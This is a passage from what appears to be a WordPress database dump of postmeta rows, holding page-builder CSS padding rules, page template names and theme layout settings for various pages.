!important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(31630,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(31631,3072,'_wp_page_template','full-width.php'),(31632,3072,'slide_template','default'),(31633,3072,'_wpb_vc_js_status','true'),(31634,3072,'mkdf_page_content_behind_header_meta','no'),(31635,3072,'mkdf_disable_vertical_header_background_image_meta','no'),(31636,3072,'mkdf_disable_header_widget_areas_meta','no'),(31637,3072,'mkdf_page_content_padding','100px 0 90px'),(31638,3072,'_dp_original','1297'),(31639,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31640,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(31641,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31642,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31643,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31644,1382,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31645,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(31646,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(31647,1382,'_wpb_shortcodes_custom_css','.vc_custom_1534406296284{padding-bottom: 60px !important;}.vc_custom_1535121294485{padding-top: 100px !important;padding-bottom: 120px !important;}.vc_custom_1534406366001{padding-top: 100px !important;}'),(31648,1382,'_wp_page_template','full-width.php'),(31649,1382,'slide_template','default'),(31650,1382,'_wpb_vc_js_status','true'),(31651,1382,'mkdf_page_content_behind_header_meta','no'),(31652,1382,'mkdf_disable_vertical_header_background_image_meta','no'),(31653,1382,'mkdf_disable_header_widget_areas_meta','no'),(31654,1382,'mkdf_page_content_padding','120px 0 100px'),(31655,1382,'_dp_original','1297'),(31656,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31657,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31658,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31659,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31660,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31661,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31662,1393,'_wp_page_template','full-width.php'),(31663,1393,'slide_template','default'),(31664,1393,'_wpb_vc_js_status','true'),(31665,1393,'mkdf_page_content_behind_header_meta','no'),(31666,1393,'mkdf_disable_vertical_header_background_image_meta','no'),(31667,1393,'mkdf_disable_header_widget_areas_meta','no'),(31668,1393,'mkdf_page_content_padding','120px 0 110px'),(31669,1393,'_dp_original','1382'),(31670,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31671,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(31672,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31673,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31674,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31675,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31676,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(31677,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(31678,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(31679,1642,'_wp_page_template','full-width.php'),(31680,1642,'slide_template','default'),(31681,1642,'_wpb_vc_js_status','true'),(31682,1642,'mkdf_page_content_behind_header_meta','no'),(31683,1642,'mkdf_disable_vertical_header_background_image_meta','no'),(31684,1642,'mkdf_disable_header_widget_areas_meta','no'),(31685,1642,'mkdf_page_content_padding','120px 0'),(31686,1642,'_dp_original','1297'),(31687,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31688,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31689,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31690,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31691,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31692,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31693,1650,'_wp_page_template','full-width.php'),(31694,1650,'slide_template','default'),(31695,1650,'_wpb_vc_js_status','true'),(31696,1650,'mkdf_page_content_behind_header_meta','no'),(31697,1650,'mkdf_disable_vertical_header_background_image_meta','no'),(31698,1650,'mkdf_disable_header_widget_areas_meta','no'),(31699,1650,'mkdf_page_content_padding','30px 0'),(31700,1650,'_dp_original','1642'),(31701,1650,'_wpb_shortcodes_custom_css','.vc_custom_1534518584017{padding-top: 30px !important;}'),(31702,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31703,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31704,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31705,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31706,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31707,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31708,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31709,1658,'_wp_page_template','full-width.php'),(31710,1658,'slide_template','default'),(31711,1658,'_wpb_vc_js_status','true'),(31712,1658,'mkdf_page_content_behind_header_meta','no'),(31713,1658,'mkdf_disable_vertical_header_background_image_meta','no'),(31714,1658,'mkdf_disable_header_widget_areas_meta','no'),(31715,1658,'mkdf_page_content_padding','120px 0'),(31716,1658,'_dp_original','1650'),(31717,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31718,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31719,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31720,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31721,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31722,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31723,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31724,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31725,1662,'_wp_page_template','full-width.php'),(31726,1662,'slide_template','default'),(31727,1662,'_wpb_vc_js_status','true'),(31728,1662,'mkdf_page_content_behind_header_meta','no'),(31729,1662,'mkdf_disable_vertical_header_background_image_meta','no'),(31730,1662,'mkdf_disable_header_widget_areas_meta','no'),(31731,1662,'mkdf_page_content_padding','120px 0 105px'),(31732,1662,'_dp_original','1658'),(31733,1679,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31734,1679,'_wp_page_template','blog-standard'),(31735,1679,'slide_template','default'),(31736,1679,'_wpb_vc_js_status','false'),(31737,1679,'mkdf_page_content_behind_header_meta','no'),(31738,1679,'mkdf_blog_category_meta','recepies'),(31739,1679,'mkdf_show_posts_per_page_meta','5'),(31740,1679,'mkdf_sidebar_layout_meta','sidebar-25-right'),(31741,1679,'mkdf_disable_vertical_header_background_image_meta','no'),(31742,1679,'mkdf_disable_header_widget_areas_meta','no'),(31743,1679,'mkdf_page_content_padding','120px 0 100px'),(31744,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31745,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(31746,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31747,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31748,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31749,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31750,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(31751,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(31752,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(31753,1722,'_wp_page_template','full-width.php'),(31754,1722,'slide_template','default'),(31755,1722,'_wpb_vc_js_status','true'),(31756,1722,'mkdf_page_content_behind_header_meta','no'),(31757,1722,'mkdf_disable_vertical_header_background_image_meta','no'),(31758,1722,'mkdf_disable_header_widget_areas_meta','no'),(31759,1722,'mkdf_page_content_padding','0'),(31760,1722,'_dp_original','1297'),(31761,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31762,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(31763,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31764,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31765,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31766,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31767,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31768,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(31769,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(31770,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(31771,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(31772,1734,'_wp_page_template','full-width.php'),(31773,1734,'slide_template','default'),(31774,1734,'_wpb_vc_js_status','true'),(31775,1734,'mkdf_page_content_behind_header_meta','no'),(31776,1734,'mkdf_disable_vertical_header_background_image_meta','no'),(31777,1734,'mkdf_disable_header_widget_areas_meta','no'),(31778,1734,'mkdf_page_content_padding','0'),(31779,1734,'_dp_original','1722'),(31780,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31781,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31782,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31783,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31784,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31785,1742,'_wp_page_template','full-width.php'),(31786,1742,'slide_template','default'),(31787,1742,'_wpb_vc_js_status','true'),(31788,1742,'mkdf_page_content_behind_header_meta','no'),(31789,1742,'mkdf_disable_vertical_header_background_image_meta','no'),(31790,1742,'mkdf_disable_header_widget_areas_meta','no'),(31791,1742,'mkdf_page_content_padding','120px 0 0'),(31792,1742,'_dp_original','1297'),(31793,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31794,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31795,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31796,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31797,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31798,3073,'_wp_page_template','full-width.php'),(31799,3073,'slide_template','default'),(31800,3073,'_wpb_vc_js_status','true'),(31801,3073,'mkdf_page_content_behind_header_meta','no'),(31802,3073,'mkdf_disable_vertical_header_background_image_meta','no'),(31803,3073,'mkdf_disable_header_widget_areas_meta','no'),(31804,3073,'mkdf_page_content_padding','110px 0 120px'),(31805,3073,'_dp_original','1297'),(31806,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31807,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(31808,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31809,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31810,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31811,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31812,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31813,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31814,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(31815,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(31816,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(31817,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(31818,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(31819,1804,'_wp_page_template','full-width.php'),(31820,1804,'slide_template','default'),(31821,1804,'_wpb_vc_js_status','true'),(31822,1804,'mkdf_page_content_behind_header_meta','no'),(31823,1804,'mkdf_disable_vertical_header_background_image_meta','no'),(31824,1804,'mkdf_disable_header_widget_areas_meta','no'),(31825,1804,'mkdf_page_content_padding','120px 0 70px'),(31826,1804,'_dp_original','1734'),(31827,1805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31828,1805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31829,1805,'_wp_page_template','full-width.php'),(31830,1805,'slide_template','default'),(31831,1805,'_wpb_vc_js_status','true'),(31832,1805,'mkdf_page_content_behind_header_meta','no'),(31833,1805,'mkdf_page_content_padding','0 0 0 0'),(31834,1805,'mkdf_page_content_padding_mobile','0 0 0 0'),(31835,1805,'mkdf_header_type_meta','header-minimal'),(31836,1805,'mkdf_disable_vertical_header_background_image_meta','no'),(31837,1805,'mkdf_disable_header_widget_areas_meta','no'),(31838,1805,'mkdf_show_title_area_meta','no'),(31839,1805,'mkdf_disable_footer_meta','yes'),(31840,1805,'_dp_original','569'),(31841,1811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31842,1811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31843,1811,'_wp_page_template','full-width.php'),(31844,1811,'slide_template','default'),(31845,1811,'_wpb_vc_js_status','true'),(31846,1811,'mkdf_page_content_behind_header_meta','no'),(31847,1811,'mkdf_page_content_padding','0 0 0 0 '),(31848,1811,'mkdf_page_content_padding_mobile','0 0 0 0'),(31849,1811,'mkdf_set_menu_area_position_meta','center'),(31850,1811,'mkdf_disable_vertical_header_background_image_meta','no'),(31851,1811,'mkdf_menu_area_background_color_meta','#ffffff'),(31852,1811,'mkdf_menu_area_background_transparency_meta','40%'),(31853,1811,'mkdf_disable_header_widget_areas_meta','no'),(31854,1811,'mkdf_show_title_area_meta','no'),(31855,1811,'mkdf_disable_footer_meta','yes'),(31856,1811,'mkdf_header_type_meta','header-standard'),(31857,1811,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(31858,1811,'mkdf_header_behaviour_meta','no-behavior'),(31859,1811,'_dp_original','1008'),(31860,1819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31861,1819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31862,1819,'_wp_page_template','default'),(31863,1819,'slide_template','default'),(31864,1819,'_wpb_vc_js_status','true'),(31865,1819,'mkdf_page_content_behind_header_meta','no'),(31866,1819,'mkdf_disable_vertical_header_background_image_meta','no'),(31867,1819,'mkdf_disable_header_widget_areas_meta','no'),(31868,1819,'mkdf_show_title_area_meta','no'),(31869,1819,'mkdf_disable_footer_meta','yes'),(31870,1819,'mkdf_menu_area_in_grid_meta','yes'),(31871,1819,'mkdf_header_type_meta','header-minimal'),(31872,1819,'mkdf_page_content_padding','0 0 0 0'),(31873,1819,'mkdf_page_content_padding_mobile','0 0 0 0'),(31874,1819,'_dp_original','610'),(31875,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31876,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(31877,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31878,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31879,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31880,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31881,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31882,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31883,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31884,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(31885,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(31886,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(31887,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(31888,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(31889,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(31890,1827,'_wp_page_template','full-width.php'),(31891,1827,'slide_template','default'),(31892,1827,'_wpb_vc_js_status','true'),(31893,1827,'mkdf_page_content_behind_header_meta','no'),(31894,1827,'mkdf_disable_vertical_header_background_image_meta','no'),(31895,1827,'mkdf_disable_header_widget_areas_meta','no'),(31896,1827,'mkdf_page_content_padding','120px 0 100px'),(31897,1827,'_dp_original','1804'),(31898,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31899,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(31900,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31901,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31902,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31903,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31904,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31905,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31906,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31907,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31908,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(31909,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(31910,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(31911,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(31912,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(31913,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(31914,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(31915,1836,'_wp_page_template','full-width.php'),(31916,1836,'slide_template','default'),(31917,1836,'_wpb_vc_js_status','true'),(31918,1836,'mkdf_page_content_behind_header_meta','no'),(31919,1836,'mkdf_disable_vertical_header_background_image_meta','no'),(31920,1836,'mkdf_disable_header_widget_areas_meta','no'),(31921,1836,'mkdf_page_content_padding','120px 0 140px'),(31922,1836,'_dp_original','1827'),(31923,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31924,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(31925,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31926,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31927,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31928,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31929,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31930,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31931,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31932,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31933,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31934,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(31935,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(31936,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(31937,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(31938,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(31939,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(31940,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(31941,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px 